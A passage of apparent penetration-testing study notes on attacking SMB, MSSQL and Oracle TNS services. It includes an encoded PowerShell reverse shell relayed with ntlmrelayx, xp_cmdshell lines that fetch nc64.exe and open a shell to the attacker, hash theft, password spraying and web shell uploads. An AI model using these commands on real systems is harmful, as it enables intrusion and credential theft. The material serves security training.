                         impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAwAC4AMQAzADMAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA'\n

                        Step 5: Finally, launch a listener. Once the victim authenticates to our server, we poison the response and make it execute our command to obtain a reverse shell.

                        nc  -lnvp 9002\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#9-smbghost","title":"9. SMBGhost","text":"

                        SMBGhost\u00a0with the\u00a0CVE-2020-0796.

                        The vulnerability consisted of a compression mechanism of the version SMB v3.1.1 which made Windows 10 versions 1903 and 1909 vulnerable to attack by an unauthenticated attacker. The vulnerability allowed the attacker to gain remote code execution (RCE) and full access to the remote target system. In simple terms, this is an\u00a0integer overflow\u00a0vulnerability in a function of an SMB driver that allows system commands to be overwritten while accessing memory.

                        POC: https://www.exploit-db.com/exploits/48537

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#enumeration","title":"Enumeration","text":"","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#rpcclient","title":"rpcclient","text":"

                        See RPC installation and basic commands.

                        The rpcclient offers us many different requests with which we can execute specific functions on the SMB server to get information. A list of some of these functions can be found at rpcclient. Most importantly, anonymous access to such services can also lead to the discovery of other users (see list of commands for rpcclient tool, who can be attacked with brute-forcing in the most aggressive case.

                        Brute forcing user enumeration with rpcclient:

                        for i in $(seq 500 1100);do rpcclient -N -U \"\" $ip -c \"queryuser 0x$(printf '%x\\n' $i)\" | grep \"User Name\\|user_rid\\|group_rid\" && echo \"\";done\n

                        Quick cheat sheet:

                        # Connect to a remote shared folder (same as smbclient in this regard)\nrpcclient -U \"\" $ip\n# rpcclient -U'%' $ip\n\n# Server information\nsrvinfo\n\n# Enumerate all domains that are deployed in the network \nenumdomains\n\n# Provides domain, server, and user information of deployed domains.\nquerydominfo\n\n# Enumerates all available shares.\nnetshareenumall\n\n# Provides information about a specific share.\nnetsharegetinfo <share>\n\n# Enumerates all domain users.\nenumdomusers\n\n# Provides information about a specific user.\nqueryuser <RID>\n    # An example:\n    # rpcclient $> queryuser 0x3e8\n\n# Provides information about a specific group.\nquerygroup <ID>\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#samrdump-from-impacket","title":"samrdump from impacket","text":"

                        An alternative for user enumeration would be a Python script from Impacket called samrdump.py.

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#smbmap","title":"SMBMap","text":"

                        SMBMap tool is widely used and helpful for the enumeration of SMB services. Quick cheat sheet:

                        # Enumerate network shares and access associated permissions.\nsmbmap -H $ip\n\n# # Enumerate network shares and access associated permissions with recursivity\nsmbmap -H $ip -r\n\n# Download a file from a specific share folder\nsmbmap -H $ip --download \"folder\\file.txt\"\n\n# Upload a file to a specific share folder\nsmbmap -H $ip --upload originfile.txt \"targetfolder\\file.txt\"\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#crackmapexec","title":"CrackMapExec","text":"

                        CrackMapExec is widely used and helpful for the enumeration of SMB services.

                        crackmapexec smb $ip --shares -u '' -p ''\n

                        Quick cheat sheet:

                        # Check if we can access a machine\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN>\n\n# Spraying password technique\ncrackmapexec smb $ip -u /folder/userlist.txt -p '<password>' --local-auth --continue-on-success\n# --continue-on-success:  continue spraying even after a valid password is found. Useful for spraying a single password against a large user list\n# --local-auth:  if we are targetting a non-domain joined computer, we will need to use the option --local-auth.\n\n# Check which machines we can access in a subnet\ncrackmapexec smb $ip/24 -u <username> -p <password> -d <DOMAIN>\n\n# Get sam: extract hashes from all users authenticated in the machine \ncrackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --sam\n\n# Get the ntds.dit, given that your user has permissions\ncrackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --ntds\n\n# See shares\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --shares\n\n# Enumerate active sessions\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --sessions\n\n# Enumerate users of the domain\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --users\n\n# Enumerate logged on users\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --loggedon-users\n\n# Using a hash instead of a password, to authenticate ourselves: Pass the hash attack (PtH)\ncrackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>\n\n# Execute commands with flag -x\ncrackmapexec smb $ip/24 -u <Administrator> -d . -H <hash> -x whoami\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#enum4linux","title":"Enum4Linux","text":"

                        Complete cheat sheet. Enum4linux is another utility that supports null sessions, and it utilizes nmblookup, net, rpcclient, and smbclient to automate some common enumeration from SMB targets such as:

                        ./enum4linux-ng.py 10.10.11.45 -A -C\n

                        Quick cheat sheet:

                        # Enumerate shares\nenum4linux.exe -S $ip\n\n# Enumerate users\nenum4linux.exe -U $ip \u00a0 \u00a0 \n\n# Enumerate machine list\nenum4linux.exe -M $ip\n\n# Display the password policy in case you need to mount a network authentification attack\nenum4linux.exe -enuP $ip\n\n# Specify username to use (default \u201c\u201d)\nenum4linux.exe -u $ip\n\n# Specify password to use (default \u201c\u201d)\nenum4linux.exe -p $ip \u00a0 \u00a0 \n\n# Also you can use brute force by adding a file\nenum4linux.exe -s /usr/share/enum4linux/share-list.txt $ip \u00a0\n\n# Do a nmblookup (similar to nbtstat)\nenum4linux.exe -n $ip \u00a0\n# In the result we see the <20> flag which means there are resources shared\n\n# Enumerates the password policy in the remote system. This is useful to use brute force\nenum4linux.exe -P $ip\n\n# Enumerates available shares\nenum4linux.exe -s $ip     \n

                        If you want to run all these commands in one line:

                        enum4linux.exe -a $ip\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#interacting-with-smb-using-windows-linux","title":"Interacting with SMB using Windows & Linux","text":"","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#windows","title":"Windows","text":"","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#using-the-explorer","title":"Using the explorer","text":"

                        [WINKEY] + [R]\u00a0to open the Run dialog box and type the file share location, e.g.:\u00a0\\\\$IP$\\Finance\\

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#using-cmd","title":"Using cmd","text":"
                        net use n: \\\\$IP$\\Finance\n# n: map its content to the drive letter\u00a0`n`\n\n\n# Provide user and password\nnet use n: \\\\$IP$\\Finance /user:plaintext Password123\n\n# how many files the shared folder and its subdirectories contain.\ndir n: /a-d /s /b | find /c \":\\\"\n# dir   Application\n# n:    Directory or drive to search\n# /a-d  /a is the attribute and -d means not directories\n# /s    Displays files in a specified directory and all subdirectories\n# /b    Uses bare format (no heading information or summary)\n# | find /c \":\\\\\" :  count how many files exist in the directory and subdirectories\n\n# Return files that contain string \"cred\" in the name\ndir n:\\*cred* /s /b\n\n# Return files that contain string \"password\" within \nfindstr /s /i password n:\\*.*\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#using-powershell","title":"Using powershell","text":"
                        # List contents of folder Finance\nGet-ChildItem \\\\$IP$\\Finance\\\n\n# Connect to a share \nNew-PSDrive -Name \"N\" -Root \"\\\\$IP\\Finance\" -PSProvider \"FileSystem\"\n\n# To provide a username and password with Powershell, we need to create a PSCredential. It offers a centralized way to manage usernames, passwords, and credentials.\n$username = 'plaintext'\n$password = 'Password123'\n$secpassword = ConvertTo-SecureString $password -AsPlainText -Force\n$cred = New-Object System.Management.Automation.PSCredential $username, $secpassword\nNew-PSDrive -Name \"N\" -Root \"\\\\$IP\\Finance\" -PSProvider \"FileSystem\" -Credential $cred\n\n# Count elements in a folder\n(Get-ChildItem -File -Recurse | Measure-Object).Count\n\n# Return files that contain string \"cred\" in the name\nGet-ChildItem -Recurse -Path N:\\ -Include *cred* -File\n\n# Return files that contain string \"password\" within \nGet-ChildItem -Recurse -Path N:\\ | Select-String \"password\" -List\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#linux","title":"Linux","text":"
                        # mount folder\nsudo mkdir /mnt/Finance\nsudo mount -t cifs -o username=plaintext,password=Password123,domain=. //$IP/Finance /mnt/Finance\n\n# As an alternative, we can use a credential file.\nmount -t cifs //$IP/Finance /mnt/Finance -o credentials=/path/credentialfile\n\n# The file credentialfile has to be structured like this:\n# username=plaintext\n# password=Password123\n# domain=.\n\n# Return files that contain string \"cred\" in the name  \nfind /mnt/Finance/ -name *cred*\n\n# Return files that contain string \"password\" within \ngrep -rn /mnt/Finance/ -ie password\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"1433-mssql/","title":"1433 msSQL","text":"

                        See msSQL.

                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#enumeration","title":"Enumeration","text":"

                        Basic enumeration:

                        nmap -Pn -sV -sC -p1433 $ip\n

                        If you don't know anything about the service:

                        nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $ip\n\nsudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $ip\n

                        We can also use Metasploit to run an auxiliary scanner called mssql_ping that will scan the MSSQL service and provide helpful information in our footprinting process.

                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#mssql-ping-in-metasploit","title":"MSSQL Ping in Metasploit","text":"
                        msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts 10.129.201.248\n\nrhosts => 10.129.201.248\n\n\nmsf6 auxiliary(scanner/mssql/mssql_ping) > run\n\n[*] 10.129.201.248:       - SQL Server information for 10.129.201.248:\n[+] 10.129.201.248:       -    ServerName      = SQL-01\n[+] 10.129.201.248:       -    InstanceName    = MSSQLSERVER\n[+] 10.129.201.248:       -    IsClustered     = No\n[+] 10.129.201.248:       -    Version         = 15.0.2000.5\n[+] 10.129.201.248:       -    tcp             = 1433\n[+] 10.129.201.248:       -    np              = \\\\SQL-01\\pipe\\sql\\query\n[*] 10.129.201.248:       - Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\n
                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#connecting-with-mssqlclientpy","title":"Connecting with Mssqlclient.py","text":"

                        If we can guess or gain access to credentials, this allows us to remotely connect to the MSSQL server and start interacting with databases using T-SQL (Transact-SQL). Authenticating with MSSQL will enable us to interact directly with databases through the SQL Database Engine. From Pwnbox or a personal attack host, we can use Impacket's mssqlclient.py to connect as seen in the output below. Once connected to the server, it may be good to get a lay of the land and list the databases present on the system.

                        python3 mssqlclient.py Administrator@$ip -windows-auth  \n# With python3 mssqlclient.py help you can see more options.\n
                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#basic-mssql-commands","title":"Basic mssql commands","text":"
                        # Get Microsoft SQL server version\nselect @@version;\n\n# Get usernames\nselect user_name()\ngo\n\n# Get databases\nSELECT name FROM master.dbo.sysdatabases\ngo\n\n# Get current database\nSELECT DB_NAME()\ngo\n\n# Get a list of users in the domain\nSELECT name FROM master..syslogins\ngo\n\n# Get a list of users that are sysadmins\nSELECT name FROM master..syslogins WHERE sysadmin = 1\ngo\n\n# And to make sure: \nSELECT is_srvrolemember(\u2018sysadmin\u2019)\ngo\n# If your user is admin, it will return 1.\n\n# Read Local Files in MSSQL\nSELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents\ngo\n
                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#attacks","title":"Attacks","text":"","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#executing-cmd-shell-in-a-sql-command-line","title":"Executing cmd shell in a SQL command line","text":"

                        Our goal can be to spawn a Windows command shell and pass in a string for execution. For that Microsoft SQL syntaxis has the command xp_cmdshell, that will allow us to use the SQL command line as a CLI.

                        Because malicious users sometimes attempt to elevate their privileges by using xp_cmdshell, xp_cmdshell is disabled by default. \u00a0xp_cmdshell\u00a0can be enabled and disabled by using the\u00a0Policy-Based Management\u00a0or by executing\u00a0sp_configure

                        sp_configure displays or changes global configuration settings for the current settings. This is how you may take advantage of it:

                        # To allow advanced options to be changed.   \nEXECUTE sp_configure 'show advanced options', 1\ngo\n\n# To update the currently configured value for advanced options.  \nRECONFIGURE\ngo\n\n# To enable the feature.  \nEXECUTE sp_configure 'xp_cmdshell', 1\ngo\n\n# To update the currently configured value for this feature.  \nRECONFIGURE\ngo\n

                        Note: The Windows process spawned by\u00a0xp_cmdshell\u00a0has the same security rights as the SQL Server service account

                        Now we can use the msSQL terminal to execute commands:

                        # This will return the .exe files existing in the current directory\nEXEC xp_cmdshell 'dir *.exe'\ngo\n\n# To print a file\nEXECUTE xp_cmdshell 'type c:\\Users\\sql_svc\\Desktop\\user.txt\ngo\n\n# With this (and a \"python3 -m http.server 80\" from our kali serving a file) we can upload a file to the attacked machine, for instance a reverse shell like nc64.exe\nxp_cmdshell \"powershell -c cd C:\\Users\\sql_svc\\Downloads; wget http://IPfromOurKali/nc64.exe -outfile nc64.exe\"\ngo\n\n# We could also bind this cmd.exe through the nc to our listener. For that open a different tab in kali and do a \"nc -lnvp 443\". When launching the reverse shell, we'll get a powershell terminal in this tab by running:\nxp_cmdshell \"powershell -c cd C:\\Users\\sql_svc\\Downloads; .\\nc64.exe -e cmd.exe IPfromOurKali 443\";\n# You could also upload winPEAS and run it from this powershell command line\n

                        There are other methods to get command execution, such as adding\u00a0extended stored procedures,\u00a0CLR Assemblies,\u00a0SQL Server Agent Jobs, and\u00a0external scripts.

                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#capture-mssql-service-hash","title":"Capture MSSQL Service Hash","text":"

                        We can steal the MSSQL service account hash using\u00a0xp_subdirs\u00a0or\u00a0xp_dirtree\u00a0undocumented stored procedures, which use the SMB protocol to retrieve a list of child directories under a specified parent directory from the file system.

                        When we use one of these stored procedures and point it to our SMB server, the directory listening functionality will force the server to authenticate and send the NTLMv2 hash of the service account that is running the SQL Server.

                        1. First, start Responder or smbserver from impacket.

                        2. Run:

                        # For XP_DIRTREE Hash Stealing\nEXEC master..xp_dirtree '\\\\$KaliIP\\share\\'\n\n# For XP_SUBDIRS Hash Stealing\nEXEC master..xp_subdirs '\\\\$KaliIP\\share\\\n

                        If the service account has access to our server, we will obtain its hash. We can then attempt to crack the hash or relay it to another host.

                        3. XP_SUBDIRS Hash Stealing with Responder

                        sudo responder -I tun0\n

                        4. XP_SUBDIRS Hash Stealing with impacket

                        sudo impacket-smbserver share ./ -smb2support\n
                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#impersonate-existing-users-with-mssql","title":"Impersonate Existing Users with MSSQL","text":"

                        SQL Server has a special permission, named IMPERSONATE, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends:

                        Impersonating sysadmin

                        # Identify Users that We Can Impersonate\nSELECT distinct b.name \nFROM sys.server_permissions a \nINNER JOIN sys.server_principals b \nON a.grantor_principal_id = b.principal_id \nWHERE a.permission_name = 'IMPERSONATE'\ngo\n\n# Verify if our current user has the sysadmin role:\nSELECT SYSTEM_USER\nSELECT IS_SRVROLEMEMBER('sysadmin')\ngo\n#  value 0 indicates no sysadmin role, value 1 is sysadmin role\n

                        Impersonating sa user

                        USE master\nEXECUTE AS LOGIN = 'sa'\nSELECT SYSTEM_USER\nSELECT IS_SRVROLEMEMBER('sysadmin')\ngo\n

                        It's recommended to run EXECUTE AS LOGIN within the master DB, because all users, by default, have access to that database.

                        To revert the operation and return to our previous user

                        REVERT\ngo\n
                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#communicate-with-other-databases-with-mssql","title":"Communicate with Other Databases with MSSQL","text":"

                        MSSQL\u00a0has a configuration option called\u00a0linked servers. Linked servers are typically configured to enable the database engine to execute a Transact-SQL statement that includes tables in another instance of SQL Server, or another database product such as Oracle.

                        If we manage to gain access to a SQL Server with a linked server configured, we may be able to move laterally to that database server.

                        # Identify linked Servers in MSSQL\nSELECT srvname, isremote FROM sysservers\ngo\n
                        srvname                             isremote\n----------------------------------- --------\nDESKTOP-MFERMN4\\SQLEXPRESS          1\n10.0.0.12\\SQLEXPRESS                0\n\n\n# isremote, where 1 means is a remote server, and 0 is a linked server. \n
                        #  Identify the user used for the connection and its privileges:\nEXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\\SQLEXPRESS]\ngo \n\n# The\u00a0[EXECUTE](https://docs.microsoft.com/en-us/sql/t-sql/language-elements/execute-transact-sql)\u00a0statement can be used to send pass-through commands to linked servers. We add our command between parenthesis and specify the linked server between square brackets (`[ ]`).\n

                        If we need to use quotes in our query to the linked server, we need to use single double quotes to escape the single quote. To run multiples commands at once we can divide them up with a semi colon (;).

                        ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#sources-and-resources","title":"Sources and resources","text":"
                        • nc64.exe.
                        • Impacket: mssqlclient.py.
                        • Pentesmonkey Cheat sheet.
                        • book.hacktricks.xyz.
                        • winPEAS.
                        ","tags":["mssql","port 1433","impacket"]},{"location":"1521-oracle-transparent-network-substrate/","title":"1521 - Oracle Transparent Network Substrate (TNS)","text":"

                        The Oracle Transparent Network Substrate (TNS) server is a communication protocol that facilitates communication between Oracle databases and applications over networks. TNS supports various networking protocols between Oracle databases and client applications, such as IPX/SPX and TCP/IP protocol stacks. As a result, it has become a preferred solution for managing large, complex databases in the healthcare, finance, and retail industries.

                        Addittionaly, it supports IPv6 and SSL/TLS encryption, which make it suitable for Name resolution, Connection management, Load balancing, Security.

                        Oracle TNS is often used with other Oracle services like Oracle DBSNMP, Oracle Databases, Oracle Application Server, Oracle Enterprise Manager, Oracle Fusion Middleware, web servers, and many more:

                        • Oracle Enterprise Manager: tool for start, stop, or restart an instance, adjust its memory allocation or other configuration parameters, and monitor its performance.
                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#footprinting-oracle-tns","title":"Footprinting Oracle TNS","text":"

                        Let's now use nmap to scan the default Oracle TNS listener port:

                        sudo nmap -p1521 -sV $ip --open\n
                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#enumerating-sids","title":"Enumerating SIDs","text":"

                        In Oracle relational databases, also known as Oracle RDBMS, there are System Identifiers (SID).

                        System Identifiers (SID) are a unique name that identifies a particular database instance. It can have multiple instances, each with its own System ID. An instance is a set of processes and memory structures that interact to manage the database's data.

                        The client uses this SID to identify which database instance it wants to connect to. If there is not a SID in the request, then, the default value defined in the tnsnames.ora file is used.

                        sudo nmap -p1521 -sV $ip --open --script oracle-sid-brute\n
                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#more-enumeration-with-odat","title":"More enumeration with ODAT","text":"

                        We can use the odat.py from ODAT tool to retrieve database names, versions, running processes, user accounts, vulnerabilities, misconfigurations,...

                        /odat.py all -s $ip\n

                        Addittionaly, if you have sysdba admin rights, you might upload a web shell to the target (more in odat)

                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#connect-to-oracle-database-sqlplus","title":"Connect to Oracle database: sqlplus","text":"

                        If we manage to get some credentials we can connect to the Oracle TNS service with sqlplus.

                        sqlplus <username>/<password>@$ip/XE;\n

                        In case of this error message ( sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory), there might be an issue with libraries. Possible solution:

                        sudo sh -c \"echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf\";sudo ldconfig\n

                        The System Database Admin in an Oracle RDBMS is sysdba. If an user has more privileges that they should have we can try to exploit it as sysdba.

                        sqlplus <user>/<password>@$ip/XE as sysdba\n
                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#upload-a-web-shell","title":"Upload a web shell","text":"

                        If we have sysdba admin rights, we might upload a web shell to the target. This requires the server to run a web server, and we need to know the exact location of the root directory for the webserver.

                        # 1. Create a non suspicious web shell \necho \"Oracle File Upload Test\" > testing.txt\n\n# 2. Upload  the shell to linux (/var/www/html) or windows (C:\\\\inetpub\\\\wwwroot):\n./odat.py utlfile -s $ip -d XE -U <user> -P <password> --sysdba --putFile C:\\\\inetpub\\\\wwwroot testing.txt ./testing.txt\n\n## 3. Test if the file upload approach worked with curl, or visit via browser.\ncurl -X GET http://$ip/testing.txt\n
                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#oracle-basic-commands","title":"Oracle basic commands","text":"
                        # List all available tables in the current database\nselect table_name from all_tables;\n\n# Show the privileges of the current user\nselect * from user_role_privs;\n\n# If we have sysdba admin rights, we might:\n    ## 1. enumerate all databases\nselect * from user_role_privs;\n\n    ## 2. extract Password Hashes\nselect name, password from sys.user$;\n\n    ## 3. upload a web shell to the target. This requires the server to run a web server, and we need to know the exact location of the root directory for the webserver.\n    ## 1. Creating a non suspicious web shell \necho \"Oracle File Upload Test\" > testing.txt\n    ## 2. Uploading the shell to linux (/var/www/html) or windows (C:\\\\inetpub\\\\wwwroot):\n./odat.py utlfile -s $ip -d XE -U <user> -P <password> --sysdba --putFile C:\\\\inetpub\\\\wwwroot testing.txt ./testing.txt\n
                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#how-does-oracle-tns-work","title":"How does Oracle TNS work","text":"","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#technical-components","title":"Technical components","text":"

                        The listener:

                        By default, the listener listens for incoming connections on the TCP/1521 port. However, this default port can be changed during installation or later in the configuration file. The TNS listener is configured to support various network protocols, including TCP/IP, UDP, IPX/SPX, and AppleTalk. The listener can also support multiple network interfaces and listen on specific IP addresses or all available network interfaces. By default, Oracle TNS can be remotely managed in Oracle 8i/9i but not in Oracle 10g/11g.

                        Additionally, the listener will use Oracle Net Services to encrypt the communication between the client and the server.

                        Configuration files for Oracle TNS

                        The configuration files for Oracle TNS are called tnsnames.ora and listener.ora and are typically located in the ORACLE_HOME/network/admin directory. The client-side Oracle Net Services software uses the tnsnames.ora file to resolve service names to network addresses, while the listener process uses the listener.ora file to determine the services it should listen to and the behavior of the listener.

                        tnsnames.ora

                        Each database or service has a unique entry in the tnsnames.ora file, containing the necessary information for clients to connect to the service. The entry consists of a name for the service, the network location of the service, and the database or service name that clients should use when connecting to the service.

                        Code: txt\n>ORCL =\n  (DESCRIPTION =\n    (ADDRESS_LIST =\n      (ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521))\n    )\n    (CONNECT_DATA =\n      (SERVER = DEDICATED)\n      (SERVICE_NAME = orcl)\n    )\n  )\n

                        listener.ora

                        The listener.ora file is a server-side configuration file that defines the listener process's properties and parameters, which is responsible for receiving incoming client requests and forwarding them to the appropriate Oracle database instance.

                        SID_LIST_LISTENER =\n  (SID_LIST =\n    (SID_DESC =\n      (SID_NAME = PDB1)\n      (ORACLE_HOME = C:\\oracle\\product\\19.0.0\\dbhome_1)\n      (GLOBAL_DBNAME = PDB1)\n      (SID_DIRECTORY_LIST =\n        (SID_DIRECTORY =\n          (DIRECTORY_TYPE = TNS_ADMIN)\n          (DIRECTORY = C:\\oracle\\product\\19.0.0\\dbhome_1\\network\\admin)\n        )\n      )\n    )\n  )\n\nLISTENER =\n  (DESCRIPTION_LIST =\n    (DESCRIPTION =\n      (ADDRESS = (PROTOCOL = TCP)(HOST = orcl.inlanefreight.htb)(PORT = 1521))\n      (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521))\n    )\n  )\n\nADR_BASE_LISTENER = C:\\oracle\n
                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#default-passwords","title":"Default passwords","text":"
                        • Oracle 9 has a default password, CHANGE_ON_INSTALL.
                        • Oracle 10 has no default password set.
                        • The Oracle DBSNMP service also uses a default password, dbsnmp.
                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#plsql-exclusion-list","title":"PL/SQL Exclusion List","text":"

                        Oracle databases can be protected by using so-called PL/SQL Exclusion List (PlsqlExclusionList). It is a user-created text file that needs to be placed in the $ORACLE_HOME/sqldeveloper directory, and it contains the names of PL/SQL packages or types that should be excluded from execution. Once the PL/SQL Exclusion List file is created, it can be loaded into the database instance. It serves as a blacklist that cannot be accessed through the Oracle Application Server.

                        Setting Description DESCRIPTION A descriptor that provides a name for the database and its connection type. ADDRESS The network address of the database, which includes the hostname and port number. PROTOCOL The network protocol used for communication with the server PORT The port number used for communication with the server CONNECT_DATA Specifies the attributes of the connection, such as the service name or SID, protocol, and database instance identifier. INSTANCE_NAME The name of the database instance the client wants to connect. SERVICE_NAME The name of the service that the client wants to connect to. SERVER The type of server used for the database connection, such as dedicated or shared. USER The username used to authenticate with the database server. PASSWORD The password used to authenticate with the database server. SECURITY The type of security for the connection. VALIDATE_CERT Whether to validate the certificate using SSL/TLS. SSL_VERSION The version of SSL/TLS to use for the connection. CONNECT_TIMEOUT The time limit in seconds for the client to establish a connection to the database. RECEIVE_TIMEOUT The time limit in seconds for the client to receive a response from the database. SEND_TIMEOUT The time limit in seconds for the client to send a request to the database. SQLNET.EXPIRE_TIME The time limit in seconds for the client to detect a connection has failed. TRACE_LEVEL The level of tracing for the database connection. TRACE_DIRECTORY The directory where the trace files are stored. TRACE_FILE_NAME The name of the trace file. LOG_FILE The file where the log information is stored.","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#extra-bonus-dual","title":"Extra Bonus: DUAL","text":"

                        The DUAL is a special one row, one column table present by default in all Oracle databases. The owner of DUAL is SYS, but DUAL can be accessed by every user. This is a possible payload for SQLi:

                        '+UNION+SELECT+NULL+FROM+dual--\n

                        Oracle syntax requires the use of FROM, but some queries don't requires any table. For these case we use DUAL. Also Oracle doesn't allow the queries that employ information_schema.tables.

                        ","tags":["oracle tns","port 1521","port 162"]},{"location":"161-162-snmp/","title":"161-162 SNMP Simple Network Management Protocol","text":"

                        Simple Network Management Protocol (SNMP) is an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behaviour.

